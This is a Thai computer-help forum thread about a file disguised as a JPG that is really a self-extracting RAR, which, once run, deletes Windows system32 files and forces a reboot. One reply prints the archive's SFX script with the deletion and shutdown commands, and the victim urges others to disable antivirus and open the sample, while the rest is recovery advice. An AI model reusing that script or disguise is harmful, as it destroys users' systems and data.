# Notification.
Notification

Author Topic: ผมโดนไวรัสตัวนี้ จะแก้ยังไงครับ เดือดร้อนมากคึรับ  (Read 5899 times)

0 Members and 1 Guest are viewing this topic.

Offline starlond

  • VPC Member.
  • **
  • Posts: 50
    • View Profile
    • Email
เวลาคุณโหลดมาแล้ว คุณต้องเปลี่ยนจาก ที่รัก.jpg เป็น ที่รัก.rarครับ ผมหมดปัญญาในแก้แก้ไวรัสตัวนี้แล้วครับ

Offline MILD_PLUS

  • Webmaster
  • *****
  • Posts: 6966
  • สมุทรปราการ/10270
    • View Profile
1. ภาพที่แนบมาผมก็เข้าไปโหลดมาดูแล้ว แต่ไม่มีภาพอะไรแสดงเลย?

2. อาการเป็นอย่างไร? เอาภาพที่เกิดอาการมาดู (เล่ารายละเอียดหน่อย)

ท่านมือปราบไวรัสจะได้หาวิธีแก้ได้ครับ

Offline starlond

  • VPC Member.
  • **
  • Posts: 50
    • View Profile
    • Email
ท่าน  MILD_PLUS ท่านต้องเปลี่ยนจาก   ที่รัก.jpg เป็น ที่รัก.rar เปลี่ยนหลังจากโหลดไฟล์ มาแล้วครับ
เปลี่ยเสร็จปุป มันจะเป็นwin .rarครับ แล้วท่านก็เข้าไปสู้กับ virusได้เลยครับ เชิญได้ตามสบาย
เครื่องผมพอโดน ไวรัสตัวนี้เครื่องมันจะค้างนะครับ  คลิกอะไรไม่ได้เลยครับ

Offline MILD_PLUS

  • Webmaster
  • *****
  • Posts: 6966
  • สมุทรปราการ/10270
    • View Profile
ท่าน  MILD_PLUS ท่านต้องเปลี่ยนจาก   ที่รัก.jpg เป็น ที่รัก.rar เปลี่ยนหลังจากโหลดไฟล์ มาแล้วครับ
เปลี่ยเสร็จปุป มันจะเป็นwin .rarครับ แล้วท่านก็เข้าไปสู้กับ virusได้เลยครับ เชิญได้ตามสบาย
เครื่องผมพอโดน ไวรัสตัวนี้เครื่องมันจะค้างนะครับ  คลิกอะไรไม่ได้เลยครับ

แล้วไปโหลดไฟล์นี้มาจากไหนครับ เอาลิ้งค์นั้นมาแปะไว้จะได้เข้าไปดูครับ

Offline ans58670

  • Webmaster
  • *****
  • Posts: 2040
    • View Profile
ก็มันเป็น RAR ก็ต้องใช้วิธีแตก File ดู...



Windows จะใช้ File Association โดยดูจากนามสกุล File ในการแสดง File Icon และ Default Program ในการเปิดซึ่งเราสามารถเปลี่ยนนามสกุลเป็นอะไรก็ได้ตามใจเรา แล้ว Windows ก็จะเอานามสกุลไฟล์นั้นไปหาโปรแกรมที่จะเปิดโดยอัตโนมัติเมื่อ Double Click
ดังนั้นเมื่อคนทำเขาใส่นามสกุลเป็น .jpg มันก็จะเปิดโดยใช้โปรแกรมเกี่ยวกับภาพเปิด...ลองเปลี่ยนมันเป็นนามสกุลดั้งเดิมที่แท้จริงของมันสิ...rar ตามในรูปที่แสดงไง [emo02]

เมื่อแตกออกมาจะได้เป็น .EXE และนี่คือข้อความใน .EXE
Code: [Select]
UNRAR 3.93 freeware      Copyright (c) 1993-2010 Alexander Roshal

;The comment below contains SFX script commands

Path=C:\WINDOWS\system32\
Setup=shutdown -r -t 00 -c " Shutdowning Windows"
Silent=1
Overwrite=1
Delete=C:\WINDOWS\system32\del
Delete=*.*


Verifying authenticity information ...  OK

Extracting  mylove.txt                                                    98%  OK

Archive mylove.exe
created at 31-08-2007 19:56
by - Eugene Roshal -

All OK

ดู Code คำสั่งของมันเอาเอง [emo02]

Offline ismaell

  • Webmaster
  • *****
  • Posts: 2196
    • View Profile
ผมลองเปิดดูปรากฏว่า  Kaspersky ขึ้นมาแดงแจ๋เลยครับ  [emo13]


ไฟล์นี้ท่่านได้มาจากไหนครับ  และถ้ามันเป็นไวรัสจริงๆ ไม่แน่มันอาจะเข้าไปวิ่งเล่นในเครื่องท่านแล้วก็เป็นได้ครับ
ลองดาวน์โหลด   Kaspersky Virus Removal Tool 2011  มาติดตั้งแล้วสั่งสแกนดูครับ

http://support.kaspersky.com/viruses/avptool2011?level=2


Offline starlond

  • VPC Member.
  • **
  • Posts: 50
    • View Profile
    • Email
ไวรัสตัวนี้ เมื่อโดนแล้วไม่สามารถเข้า windowได้ครับ ผมลองมาทุกวิธีแล้วไม่สามารถเข้าwindowได้ครับ
จะทำยังไงดีครับ ที่ผมมาตั้งกะทู้เพราะว่า เอกสารสำคัญมันอยู่ในไดร์ c ครับ และที่ผมตั้งกะทูได้เพราะว่า ผมใช้

คอมพิวเตอร์อีกเครื่องครับ  ท่านเซียนทั้งหลายลอกดับเบิ้ลคลิกดู แล้วอาการมันจะเหมือนของผม ท่านเซียนทั้งหลาย
ช่วยชี้แนะด้วยครับ ไวรัสตัวนี้สุดยอดจิงๆ ท่านที่ใช้ kaspersky อยู่ ท่านต้องกดออก ก่อนนะครับคือให้kasperskyออกก่อน แล้วท่านจึง ดับเบิ้ล คลิกดูครับ  โปรดช่วยชี้แนะแก่ ข้าพเจ้าด้วย

Offline ismaell

  • Webmaster
  • *****
  • Posts: 2196
    • View Profile
เมื่อไม่สามารถเข้าวินโดวส์ได้  ลองบู๊ตด้วย Kaspersky Rescue Disk  โหลดมาเขียนลงแผ่น  หรือจะทำเป็นบู๊ตด้วย USB แฟลชไดรฟ์ก็ได้

ดาวน์โหลด >>  http://rescuedisk.kaspersky-labs.com/rescuedisk/updatable/kav_rescue_10.iso

เมื่อบู๊ตเครื่องด้วย  Kaspersky Rescue Disk  ขึ้นมาแล้ว ก็กำจัดมันทุกไดร์ฟ์เลยครับ

วิธีการเขียนไฟล์ iso ลงแผ่นแบบง่ายๆ ลองดูที่นี่ครับ
http://www.varietypc.net/webboard/index.php?topic=128.0

หรือถ้าจะจับมันใส่และบู๊ตด้วย USB Flash Drive ดูที่นี่
http://support.kaspersky.com/viruses/rescuedisk/main?qid=208282163

ลองดูครับ  [emo02]

Offline MILD_PLUS

  • Webmaster
  • *****
  • Posts: 6966
  • สมุทรปราการ/10270
    • View Profile
แม้...ผมอยากจะไปทดสอบโหลดจากต้นตอของมันว่าเป็นเว็บฯไหน? ประเภท 18+++ หรือเปล่าครับ [emo05]

Offline ans58670

  • Webmaster
  • *****
  • Posts: 2040
    • View Profile
เจ้าตัวนี้ถ้าเปิดไปแล้วละก็...Scan ก็ไม่หาย ไม่ตายก็สาหัส (ที่หายไปพักใหญ่ๆก็เพราะต้องการทดลองเพื่อหาวิธีแก้...หาก Run มันไปแล้ว) [emo12]

น่าโมโหที่ว่า...ดั้งเดิมมันเป็นของฝรั่ง แล้วพี่ไทยคนไหนให้ความกรุณาเอามันมาเป็นชื่อภาษาไทยนี่ (ขอด่าว่า...บัดซบจริงๆเลย) [emo11]

จาก Code คำสั่งที่ให้ดูจะพบว่ามันจะพุ่งเป็นจรวดเข้าไปยัง System32 จากนั้น...หาก File หรือ Folder ไหนที่กำลังใช้งานอยู่...เน้นว่า...ที่กำลังใช้งานอยู่ใน System32...มันก็จะลบทิ้ง หากลบไม่ได้ มันก็จะเปลี่ยน File หรือ Folder นั้นให้มีนามสกุลเป็น .0.Temp (จะกี่รอบก็คงแล้วแต่อารมณ์ของมัน)

การที่ Boot เข้า Windows ไม่ได้เพราะมันไปลบ ntoskrnl.exe (NT Operation System Kernel) ซึ่งเป็นตัวสำคัญกำหนดว่าจะให้เข้า Windows ใน Mode ต่างๆ มิหนำซ้ำยังทะลึ่งไปเพิ่มนามสกุล UXTheme ให้หาไม่เจอจึงเปิดไม่ได้หนักเข้าไปอีก (มันคงกลัวว่าแก้ตัวหนึ่งแล้วจะยังเปิดได้อยู่กระมัง?) [emo14]

จากการเล่นของของตนเอง...มีขั้นตอนดังนี้
1. เข้า MiniXP หรือ 7PE แล้วลบไอ้ตัวแสบทิ้งไปก่อน ไม่ต้องกลัวว่าจะมีแอบไว้ที่ไหนอีก มันไม่เพิ่มจำนวนแน่นอน
2. เข้าไปแก้ File และ Folder ที่มีต่อท้ายแถมว่า .0.Temp แต่ยังใช้ไม่ได้ เพราะไม่รู้ว่ามันลบอะไรไปบ้าง
3. Copy เอา Folder ชื่อ Users ใน Drive C: ไปเก็บไว้ก่อน...กันเหนียว
4. ใช้ GImageX เรียกเอา Drive C: ที่ Backup ไว้กลับมา Merge กับของที่มันเหลือเอาไว้ให้

แค่นี้ก็กลับคืนสู่สภาพปกติ ใช้เวลาไม่น่าเกิน 1 ชั่วโมง [emo02]

Offline starlond

  • VPC Member.
  • **
  • Posts: 50
    • View Profile
    • Email
ท่าน  ans58670 มันทำยังไงครับ ขั้นตอนที่ 3 กับขั้นตอนที่4

3. Copy เอา Folder ชื่อ Users ใน Drive C: ไปเก็บไว้ก่อน...กันเหนียว
4. ใช้ GImageX เรียกเอา Drive C: ที่ Backup ไว้กลับมา Merge กับของที่มันเหลือเอาไว้ให้
ที่ท่านบอกว่าใช้ gimagex มันคืออะไรครับ เป็นโปรแกรมไว้ทำอะไรครับ ช่วยอธิบายให้ละเอียดด้วยครับ
ผมขอ gimagexได้มั้ยครับ   ถ้า ขั้นตอน ที่3และ4 ผมไม่มี ต้องลงwindowไหม่ใช่มั้ยครับ


Offline ans58670

  • Webmaster
  • *****
  • Posts: 2040
    • View Profile
3. Users ก็คือ Users Folder ใน Drive C: ของ Windows 7 ซึ่งหากเทียบกับ Windows XP ก็น่าจะเป็น "Document and Settings" (หรือเปล่า?)

4. GImageX คือ Utility สารพัดประโยชน์ตัวหนึ่งที่ดัดแปลงมาจาก ImageX ของ Microsoft เอาไว้ใช้ตั้งแต่ Backup ไปจนถึงติดตั้ง Windows Vista ขึ้นไป มีอยู่ใน Hiren's Boot สามารถนำ Backup มา Merge เข้ากับของที่มีอยู่ได้ เมื่อถามเช่นนี้ แปลว่าคงจะไม่มีและไม่เคยใช้แน่ๆ หากเคยใช้ Ghost หรือ Program อื่นใดทำ Backup เอาไว้ ก็ให้เข้า MiniXP แล้วเอา File ที่สำคัญออกมาก่อน แล้วค่อยเอา Ghost หรือ Backup ที่ทำไว้ทับลงไป (Systen Restore ใช้ไม่ได้จ้า) [emo02]

Offline numnim

  • VPC Member
  • ***
  • Posts: 100
    • View Profile
น่าโมโหที่ว่า...ดั้งเดิมมันเป็นของฝรั่ง แล้วพี่ไทยคนไหนให้ความกรุณาเอามันมาเป็นชื่อภาษาไทยนี่ (ขอด่าว่า...บัดซบจริงๆเลย)



พี่ans 58670 อย่าจริงจังมากไปสิค่ะ (แวะมาอ่านด้วยคน)  [emo01]

Offline Annop

  • VPC Member
  • ****
  • Posts: 1001
    • View Profile
ถ้าเป็นผมคงไม่แก้แล้วครับแบบนี้ ถ้ามีข้อมูลสำคัญ
มักจะใช้ Hiren's Boot CD แล้ว Boot เป็น Mini XP
Copy ข้อมูลที่สำคัญออกมาให้ได้ แล้ว Format เลยครับ

Offline MILD_PLUS

  • Webmaster
  • *****
  • Posts: 6966
  • สมุทรปราการ/10270
    • View Profile
ถ้าเป็นผมคงไม่แก้แล้วครับแบบนี้ ถ้ามีข้อมูลสำคัญ
มักจะใช้ Hiren's Boot CD แล้ว Boot เป็น Mini XP
Copy ข้อมูลที่สำคัญออกมาให้ได้ แล้ว Format เลยครับ

คิดเหมือนกันกับผมเลยครับ .... ถึงจะแก้ปัญหาได้แต่...มันก็ไม่เคลียร์เหมือนการลงวินโดวส์ใหม่ครับ

ปล. ผมชอบวิธีป้องกันมากกว่าวิธีแก้ครับ (ล้อมคอกก่อนวัวหายครับ)  [emo05]


 

Sitemap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27